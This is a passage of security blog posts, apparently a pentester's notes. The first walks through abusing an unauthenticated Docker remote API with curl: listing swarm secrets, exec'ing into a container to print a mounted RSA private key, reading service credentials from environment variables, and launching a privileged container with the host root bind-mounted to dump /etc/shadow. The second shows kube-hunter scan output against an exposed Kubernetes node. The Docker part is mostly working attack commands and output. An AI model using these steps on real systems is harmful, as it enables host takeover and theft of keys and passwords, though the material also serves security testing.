<span style="color: #444444;"><span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> curl -s --insecure https://tls-opendocker.socket:2376/secrets | jq</span></span><br />
<span style="color: #444444;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> { "message": "This node is not a swarm manager. Use \"docker swarm init\" or \"docker swarm join\" to connect this node to swarm and try again."}</span></span><br />
<span style="color: #444444;"><br /></span>
<b><span style="color: #444444;"> list secrets (they exist)</span></b><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> $ curl -s --insecure https://tls-opendocker.socket:2376/secrets | jq</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> [</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> {</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "ID": "9h3useaicj3tr465ejg2koud5",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "Version": {</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "Index": 21</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> },</span><br />
<span style="color: #444444;"><span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "CreatedAt": "2018-07-06T10:19:50.677702428Z",</span></span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "UpdatedAt": "2018-07-06T10:19:50.677702428Z",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "Spec": {</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "Name": "registry-key.key",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "Labels": {} }},</span><br />
<span style="color: #444444;"><br /></span>
<b><span style="color: #444444;">Check what is mounted</span></b><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/e280bd8c8feaa1f2c82cabbfa16b823f4dd42583035390a00ae4dce44ffc7439/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "mount"]}'</span><br />
<span style="color: #444444;"><span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> {"Id":"7fe5c7d9c2c56c2b2e6c6a1efe1c757a6da1cd045d9b328ea9512101f72e43aa"}</span></span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;"><br /></span>
<b><span style="color: #444444;">Get the output by starting the exec</span></b><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/exec/7fe5c7d9c2c56c2b2e6c6a1efe1c757a6da1cd045d9b328ea9512101f72e43aa/start -d '{}'</span><br />
<span style="color: #444444;"><span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">overlay on / type overlay </span></span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">tmpfs on /dev type tmpfs (rw,nosuid,size=65536k,mode=755)</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666)</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">sysfs on /sys type sysfs (ro,nosuid,nodev,noexec,relatime)</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">---SNIP---</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">mqueue on /dev/mqueue type mqueue (rw,nosuid,nodev,noexec,relatime)</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">/dev/sda2 on /etc/resolv.conf type ext4 (rw,relatime,errors=remount-ro,data=ordered)</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">/dev/sda2 on /etc/hostname type ext4 (rw,relatime,errors=remount-ro,data=ordered)</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">/dev/sda2 on /etc/hosts type ext4 (rw,relatime,errors=remount-ro,data=ordered)</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">shm on /dev/shm type tmpfs (rw,nosuid,nodev,noexec,relatime,size=65536k)</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">/dev/sda2 on /var/lib/registry type ext4 (rw,relatime,errors=remount-ro,data=ordered)</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"><b>tmpfs on /run/secrets/registry-cert.crt type tmpfs (ro,relatime)</b></span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"><b>tmpfs on /run/secrets/htpasswd type tmpfs (ro,relatime)</b></span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"><b>tmpfs on /run/secrets/registry-key.key type tmpfs (ro,relatime)</b></span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">---SNIP---</span><br />
<span style="color: #444444;"><br /></span>
<b><span style="color: #444444;">Cat the mounted secret</span></b><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/e280bd8c8feaa1f2c82cabbfa16b823f4dd42583035390a00ae4dce44ffc7439/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "cat /run/secrets/registry-key.key"]}'</span><br />
<span style="color: #444444;"><span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> {"Id":"3a11aeaf81b7f343e7f4ddabb409ad1eb6024141a2cfd409e5e56b4f221a7c30"}</span></span><br />
<span style="color: #444444;"><span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/exec/3a11aeaf81b7f343e7f4ddabb409ad1eb6024141a2cfd409e5e56b4f221a7c30/start -d '{}'</span></span><br />
<span style="color: #444444;"><span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> -----BEGIN RSA PRIVATE KEY-----</span></span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">MIIJKAIBAAKCAgEA1A/ptrezfxUlupPgKd/kAki4UlKSfMGVjD6GnJyqS0ySHiz0</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">---SNIP---</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">If you have secrets, it's also worth checking out services in case they are adding secrets via environment variables</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> curl -s --insecure https://tls-opendocker.socket:2376/services | jq</span><br />
<span style="color: #444444;"><span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> [{</span></span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "ID": "amxjs243dzmlc8vgukxdsx57y",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "Version": {</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "Index": 6417</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> },</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "CreatedAt": "2018-04-16T19:51:20.489851317Z",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "UpdatedAt": "2018-12-07T13:44:36.6869673Z",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "Spec": {</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "Name": "app_REMOVED",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "Labels": {},</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "TaskTemplate": {</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "ContainerSpec": {</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "Image": "dpage/pgadmin4:latest@sha256:5b8631d35db5514d173ad2051e6fc6761b4be6c666105f968894509c5255c739",</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "Env": [</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "PGADMIN_DEFAULT_EMAIL=REMOVED<removed>@gmail.com",</removed></span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "PGADMIN_DEFAULT_PASSWORD=REMOVED"<removed></removed></span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> ],</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"> "Isolation": "default"</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;"><br /></span>
<span style="color: #444444; font-family: inherit;"> Creating a container that has mounted the host file system</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket2376/containers/create?name=test -d '{"Image":"alpine", "Cmd":["/usr/bin/tail", "-f", "1234", "/dev/null"], "<b>Binds": [ "/:/mnt" ]</b>, <b>"Privileged": true</b>}'</span><br />
<span style="color: #444444;"><span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">{"Id":"0f7b010f8db33e6abcfd5595fa2a38afd960a3690f2010282117b72b08e3e192","Warnings":null}</span></span><br />
<span style="color: #444444;"><span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/0f7b010f8db33e6abcfd5595fa2a38afd960a3690f2010282117b72b08e3e192/start?name=test</span></span><br />
<span style="color: #444444;"><span style="font-family: inherit; font-size: x-small;"><br /></span>
<span style="font-family: inherit; font-size: xx-small;">Read something from the host</span></span><br />
<span style="color: #444444;"><span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/0f7b010f8db33e6abcfd5595fa2a38afd960a3690f2010282117b72b08e3e192/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "cat /mnt/etc/shadow"]}'</span></span><br />
<span style="color: #444444;"><span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">{"Id":"140e09471b157aa222a5c8783028524540ab5a55713cbfcb195e6d5e9d8079c6"}</span></span><br />
<span style="color: #444444;"><span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span><span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/exec/140e09471b157aa222a5c8783028524540ab5a55713cbfcb195e6d5e9d8079c6/start -d '{}'</span></span><br />
<span style="color: #444444;"><span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">root:$6$THEPASSWORDHASHWUZHERE:17717:0:99999:7:::</span></span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">daemon:*:17001:0:99999:7:::</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">bin:*:17001:0:99999:7:::</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">sys:*:17001:0:99999:7:::</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">sync:*:17001:0:99999:7:::</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">games:*:17001:0:99999:7:::</span><br />
<span style="color: #444444;"><br /></span>
<br />
<div>
<b><span style="color: #444444; font-family: inherit;">Cleanup</span></b></div>
<div>
<span style="color: #444444; font-family: inherit;"><br /></span></div>
<div>
<span style="color: #444444; font-family: inherit;">Stop the container</span></div>
<div>
<span style="color: #444444;"><br /></span></div>
<div>
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">curl --insecure -vv -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/0f7b010f8db33e6abcfd5595fa2a38afd960a3690f2010282117b72b08e3e192/stop</span></div>
<div>
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span></div>
<div>
<span style="color: #444444; font-family: inherit;">delete stopped containers</span></div>
<div>
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span></div>
<div>
<span style="color: #444444; font-family: "courier new" , "courier" , monospace; font-size: x-small;">curl --insecure -vv -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/prune</span></div>
<div>
<span style="color: #444444;"><br /></span></div>
<div>
<span style="color: #444444;"><br /></span></div>
<div>
<br /></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8539880144347728238.post-14465291686942328242019-01-16T09:00:00.002-05:002019-01-16T09:00:13.112-05:00Kubernetes: Kube-Hunter 10255Below is some sample output that mainly is here to see what open 10255 will give you and look like. What probably of most interest is the /pods endpoint<br />
<span style="font-family: inherit;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4nSvm65ri_pWBpQVBvd9TW1L1Auz9JxpeGXSz8_trLBt_qPVBWOsu_mdTmuGv45Pyj87Q5X3HYF9zgqfC8OgwcPglp_gaOLPRl6KCfdyI4iznOkMDtYCKNPRDg5Ul6owmWv_q09mDI5w/s1600/10255-pods.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" data-original-height="620" data-original-width="1600" height="155" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4nSvm65ri_pWBpQVBvd9TW1L1Auz9JxpeGXSz8_trLBt_qPVBWOsu_mdTmuGv45Pyj87Q5X3HYF9zgqfC8OgwcPglp_gaOLPRl6KCfdyI4iznOkMDtYCKNPRDg5Ul6owmWv_q09mDI5w/s400/10255-pods.png" width="400" /></span></a></div>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">or the /metrics endpoint</span><br />
<span style="font-family: inherit;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: inherit; margin-left: 1em; margin-right: 1em;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPH9cxKELFMg0FJSfZPiCCi42KXvsHFmQziPuXlVykgVN8QZukd1R2_GOaQXa3pP9MroGVQtkmQkrDeKcjBIuZly4-LHvDlgRLqqYqsGjVSCLKH60ruRl36b-ElCOJDZesxJ7cxB34XqY/s1600/10255-metrics.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="442" data-original-width="1600" height="110" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPH9cxKELFMg0FJSfZPiCCi42KXvsHFmQziPuXlVykgVN8QZukd1R2_GOaQXa3pP9MroGVQtkmQkrDeKcjBIuZly4-LHvDlgRLqqYqsGjVSCLKH60ruRl36b-ElCOJDZesxJ7cxB34XqY/s400/10255-metrics.png" width="400" /></a></span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
or the /stats endpoint</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjl1ljCXGAMAIJnsdELUYoPXxZnTrgu0padIJ_mIV_ca3cZJ7UiyHaXgP-3nUKlIblf5eKT82auiLJ3pWb4EmuW0FkHo03UuIw2ARqsYPOfzfHjIllntkb-J3CTvGWIdixIrlPeF_0ePz4/s1600/10255-stats.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1306" data-original-width="1600" height="326" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjl1ljCXGAMAIJnsdELUYoPXxZnTrgu0padIJ_mIV_ca3cZJ7UiyHaXgP-3nUKlIblf5eKT82auiLJ3pWb4EmuW0FkHo03UuIw2ARqsYPOfzfHjIllntkb-J3CTvGWIdixIrlPeF_0ePz4/s400/10255-stats.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<span style="font-family: inherit; font-size: xx-small;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">$ ./kube-hunter.py</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Choose one of the options below:</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">1. Remote scanning (scans one or more specific IPs or DNS names)</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">2. Subnet scanning (scans subnets on all local network interfaces)</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">3. IP range scanning (scans a given IP range)</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Your choice: 1</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Remotes (separated by a ','): 1.2.3.4</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">~ Started</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">~ Discovering Open Kubernetes Services...</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">|</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| Etcd:</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| type: open service</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| service: Etcd</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">|_ host: 1.2.3.4:2379</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">|</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| API Server:</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| type: open service</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| service: API Server</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">|_ host: 1.2.3.4:443</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">|</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| API Server:</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| type: open service</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| service: API Server</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">|_ host: 1.2.3.4:6443</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">|</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| Etcd Remote version disclosure:</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| type: vulnerability</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| host: 1.2.3.4:2379</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| description:</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| Remote version disclosure might give an</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">|_ attacker a valuable data to attack a cluster</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">|</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| Etcd is accessible using insecure connection (HTTP):</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| type: vulnerability</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| host: 1.2.3.4:2379</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| description:</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| Etcd is accessible using HTTP (without</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| authorization and authentication), it would allow a</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| potential attacker to</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| gain access to</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">|_ the etcd</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">|</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| Kubelet API (readonly):</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| type: open service</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| service: Kubelet API (readonly)</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">|_ host: 1.2.3.4:10255</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">|</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| Etcd Remote Read Access Event:</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| type: vulnerability</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| host: 1.2.3.4:2379</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| description:</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| Remote read access might expose to an</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">|_ attacker cluster's possible exploits, secrets and more.</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">|</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| K8s Version Disclosure:</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| type: vulnerability</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| host: 1.2.3.4:10255</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| description:</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| The kubernetes version could be obtained</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">|_ from logs in the /metrics endpoint</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">|</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| Privileged Container:</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| type: vulnerability</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| host: 1.2.3.4:10255</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| description:</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| A Privileged container exist on a node.</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| could expose the node/cluster to unwanted root</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">|_ operations</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">|</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| Cluster Health Disclosure:</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| type: vulnerability</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| host: 1.2.3.4:10255</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| description:</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| By accessing the open /healthz handler, an</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| attacker could get the cluster health state without</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">|_ authenticating</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">|</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| Exposed Pods:</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| type: vulnerability</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| host: 1.2.3.4:10255</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| description:</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| An attacker could view sensitive information</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| about pods that are bound to a Node using</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">|_ the /pods endpoint</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">----------</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Nodes</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">+-------------+---------------+</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| TYPE | LOCATION |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">+-------------+---------------+</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| Node/Master | 1.2.3.4<span style="white-space: pre;"> </span> |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">+-------------+---------------+</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Detected Services</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">+----------------------+---------------------+----------------------+</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| SERVICE | LOCATION | DESCRIPTION |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">+----------------------+---------------------+----------------------+</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| Kubelet API | 1.2.3.4:10255 | The read-only port |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| (readonly) | | on the kubelet |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| | | serves health |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| | | probing endpoints, |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| | | and is relied upon |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| | | by many kubernetes |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| | | componenets |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">+----------------------+---------------------+----------------------+</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| Etcd | 1.2.3.4:2379 | Etcd is a DB that |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| | | stores cluster's |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| | | data, it contains |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| | | configuration and |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| | | current state |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| | | information, and |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| | | might contain |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| | | secrets |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">+----------------------+---------------------+----------------------+</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| API Server | 1.2.3.4:6443 | The API server is in |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| | | charge of all |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| | | operations on the |</span><br />
